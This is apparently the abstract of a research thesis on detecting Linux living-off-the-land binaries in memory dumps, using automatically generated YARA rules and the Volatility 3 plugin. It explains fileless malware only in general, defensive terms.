In recent years, cybersecurity attacks have become more sophisticated and complex, and even advanced researchers have struggled to implement measures that can mitigate them. Malware programs now adopt a stealthier and more careful approach than in the past. Ransomware, rootkits, and file less malware can execute their malicious activities directly in an operating system’s memory. This makes them extremely difficult to detect, because traditional antivirus tools are fundamentally inadequate, meaning that they focus mainly on scanning files on the disk, while advanced threats bypass the file system entirely. Even with memory monitoring, antivirus software often falls short on modern attack techniques, leaving systems vulnerable to stealthy, fileless infections. Historically fileless malware has been most prevalent on Windows systems, where attackers exploit native tools such as PowerShell and WMI to execute malicious code directly in memory. However, more recently Linux environments have also become a target, with adversaries leveraging legitimate binary commands to establish a stealthier and difficult to detect attack approaches. This evolution highlights the growing complexity of fileless techniques across multiple operating systems. Researchers specializing in memory forensics have developed a range of tools to detect such attacks in a computer’s memory. Volatility and Rekall are prominent examples. They also created pattern matching tools called YARA rules, that can be applied to both file system and memory. YARA rules detect malware signatures from strings, hex patterns, and code snippets, helping trace malware in the wild. This research project will cover LOLBins (Living off the Land binaries) in Linux systems. LOLBins are commonly exploited tools that enable fileless attacks. By applying YARA rules, the presence of known LOLBins can be identified in memory, which may indicate binaries that are frequently abused by attackers. These rules can assist memory forensic analysts in identifying potentially suspicious binaries in memory and prioritizing further investigation. The YARA rules will be generated automatically by a Python based YARA Generator program, a useful tool that creates YARA rules faster and without manual effort. Finally, the research thesis will also use Volatility 3 YARA plugin to take the rules for LOLBins detections in a Linux memory dump.